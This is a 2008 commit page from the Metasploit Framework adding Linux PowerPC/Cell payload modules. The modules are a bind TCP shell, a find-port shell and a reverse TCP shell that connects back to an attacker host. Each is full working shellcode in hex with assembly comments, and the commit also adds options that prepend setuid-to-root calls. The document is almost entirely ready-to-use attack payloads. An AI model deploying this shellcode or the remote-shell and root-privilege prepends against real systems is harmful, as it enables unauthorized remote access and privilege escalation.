Skip to content

Commit

Permalink
Added Linux Power/Cell Broadband Engine Architecture payload modules …
Browse files Browse the repository at this point in the history
…and advanced payload options

git-svn-id: file:///home/svn/framework3/trunk@5899 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information
Ramon de C Valle committed Nov 13, 2008
1 parent 73b02f1 commit dfbf6b3
Show file tree
Hide file tree
Showing 7 changed files with 601 additions and 1 deletion.
46 changes: 45 additions & 1 deletion lib/msf/core/payload/linux.rb
Original file line number Diff line number Diff line change
Expand Up @@ -106,8 +106,52 @@ def generate(*args)

end

# Handle all Power/CBEA code here
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))

# Prepend

if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end

# Append

if (datastore['AppendExit'])
# exit(0)
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end

end

return (pre + buf + app)
end


end
end
100 changes: 100 additions & 0 deletions modules/payloads/singles/linux/ppc/shell_bind_tcp.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,100 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'


module Metasploit3

include Msf::Payload::Single
include Msf::Payload::Linux

def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision$',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC, ARCH_CBEA ],
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end

end
87 changes: 87 additions & 0 deletions modules/payloads/singles/linux/ppc/shell_find_port.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'msf/core/handler/find_port'
require 'msf/base/sessions/command_shell'


module Metasploit3

include Msf::Payload::Single
include Msf::Payload::Linux

def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Find Port Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC, ARCH_CBEA ],
'Handler' => Msf::Handler::FindPort,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x05" +# addi r1,r1,-507 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end

end
91 changes: 91 additions & 0 deletions modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,91 @@
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'


module Metasploit3

include Msf::Payload::Single
include Msf::Payload::Linux

def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ ARCH_PPC, ARCH_CBEA ],
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ],
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"/bin/sh"
}
))
end

end
Loading

0 comments on commit dfbf6b3

Please sign in to comment.